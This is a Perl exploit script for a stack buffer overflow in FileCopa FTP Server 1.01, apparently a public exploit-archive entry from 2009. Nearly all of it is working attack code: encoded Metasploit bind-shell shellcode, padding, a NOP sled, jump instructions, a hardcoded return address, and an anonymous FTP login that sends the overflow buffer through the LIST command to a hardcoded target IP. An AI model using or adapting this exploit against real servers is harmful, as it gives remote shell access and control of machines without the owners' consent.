#!/usr/bin/perl
#Exploit for FileCopa FTP Server Ver 1.01
#After trying the sploitcode found on milw0rm I found out that I didn't have enough bytes under Windows XP SP2
#Also the offsets for instance for EIP wasn't correct
#So I used a backward jump to find enough room
#for add to ECX and then jump to it (17 bytes required, just 12 available)
#Then it is pretty straightforward shellcode
#Written by KMDave 
#01/26/2009

##fixed on the BT day 2k9 by:
##smtx, cleguevara, pyro, m-1-k-3

use Net::FTP;

# shellcode from msfpayload
# $sc =	  ""
# root@bt:/pentest/exploits/framework3# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -t perl
# [*] x86/shikata_ga_nai succeeded with size 369 (iteration=1)

$sc =
"\xda\xdc\xd9\x74\x24\xf4\x2b\xc9\xb1\x56\x58\xbe\x78\xcd" .
"\xad\xb7\x31\x70\x19\x03\x70\x19\x83\xe8\xfc\x9a\x38\x51" .
"\x5f\xd3\xc3\xaa\xa0\x83\x4a\x4f\x91\x91\x29\x1b\x80\x25" .
"\x39\x49\x29\xce\x6f\x7a\xba\xa2\xa7\x8d\x0b\x08\x9e\xa0" .
"\x8c\xbd\x1e\x6e\x4e\xdc\xe2\x6d\x83\x3e\xda\xbd\xd6\x3f" .
"\x1b\xa3\x19\x6d\xf4\xaf\x88\x81\x71\xed\x10\xa0\x55\x79" .
"\x28\xda\xd0\xbe\xdd\x50\xda\xee\x4e\xef\x94\x16\xe4\xb7" .
"\x04\x26\x29\xa4\x79\x61\x46\x1e\x09\x70\x8e\x6f\xf2\x42" .
"\xee\x23\xcd\x6a\xe3\x3a\x09\x4c\x1c\x49\x61\xae\xa1\x49" .
"\xb2\xcc\x7d\xdc\x27\x76\xf5\x46\x8c\x86\xda\x10\x47\x84" .
"\x97\x57\x0f\x89\x26\xb4\x3b\xb5\xa3\x3b\xec\x3f\xf7\x1f" .
"\x28\x1b\xa3\x3e\x69\xc1\x02\x3f\x69\xad\xfb\xe5\xe1\x5c" .
"\xef\x9f\xab\x08\xdc\xad\x53\xc9\x4a\xa6\x20\xfb\xd5\x1c" .
"\xaf\xb7\x9e\xba\x28\xb7\xb4\x7a\xa6\x46\x37\x7a\xee\x8c" .
"\x63\x2a\x98\x25\x0c\xa1\x58\xc9\xd9\x65\x09\x65\xb2\xc5" .
"\xf9\xc5\x62\xad\x13\xca\x5d\xcd\x1b\x00\xe8\xca\xd5\x70" .
"\xb8\xbc\x17\x87\x2e\x60\x91\x61\x3a\x88\xf7\x3a\xd3\x6a" .
"\x2c\xf3\x44\x95\x06\xaf\xdd\x01\x1e\xb9\xda\x2e\x9f\xef" .
"\x48\x83\x37\x78\x1b\xcf\x83\x99\x1c\xda\xa3\xd0\x24\x8c" .
"\x3e\x8d\xe7\x2d\x3e\x84\x90\xce\xad\x43\x61\x99\xcd\xdb" .
"\x36\xce\x20\x12\xd2\xe2\x1b\x8c\xc1\xff\xfa\xf7\x42\xdb" .
"\x3e\xf9\x4b\xae\x7b\xdd\x5b\x76\x83\x59\x08\x26\xd2\x37" .
"\xe6\x80\x8c\xf9\x50\x5a\x62\x50\x35\x1b\x48\x63\x43\x24" .
"\x85\x15\xab\x94\x70\x60\xd3\x18\x15\x64\xac\x45\x85\x8b" .
"\x67\xce\xa5\x69\xa2\x3a\x4e\x34\x27\x87\x13\xc7\x9d\xcb" .
"\x2d\x44\x14\xb3\xc9\x54\x5d\xb6\x96\xd2\x8d\xca\x87\xb6" .
"\xb1\x79\xa7\x92\xb8";

$pad =    "A" x 223;			# overflow 0x41 padding
$pad2 =   "\x90" x 20;			# NOP-sled

$ecxjmp = "\x81\xc1\x53\xf1\xff\x0f".
	  "\x81\xe9\x01\xf0\xff\x0f".
	  "\xff\xe1".
	  "\x90\x90\x90";		# NOP-sled

					#JMP ESP // search for a jmp esp in the immunity-debugger
#$eip =    "\xC8\xAE\xD5\x77";		# \xC8\xAE\xD5\x77 <-- original address from milw0rm
$eip =	  "\x47\x74\xD2\x77";		# \x77\xD2\x74\x47 <-- from immunity-debugger

$bjump =  "\xeb\xe9";  			# 0xEB = JMP; 0xE9 = 233 bytes

$buffer =  "A\x20" .  $pad . $ecxjmp . $eip . $bjump . $pad2 .$sc ;
#print $buffer;

#$target = "192.168.0.220";
$target = "192.168.1.102";
$ftp = Net::FTP->new($target, Debug=> 0, Timeout => 5)
	or die "Cannot connect \n";

$ftp->login("anonymous","you@wish.com")
	or die "Cannot log in\n";

$ftp->list($buffer);
$ftp->quit;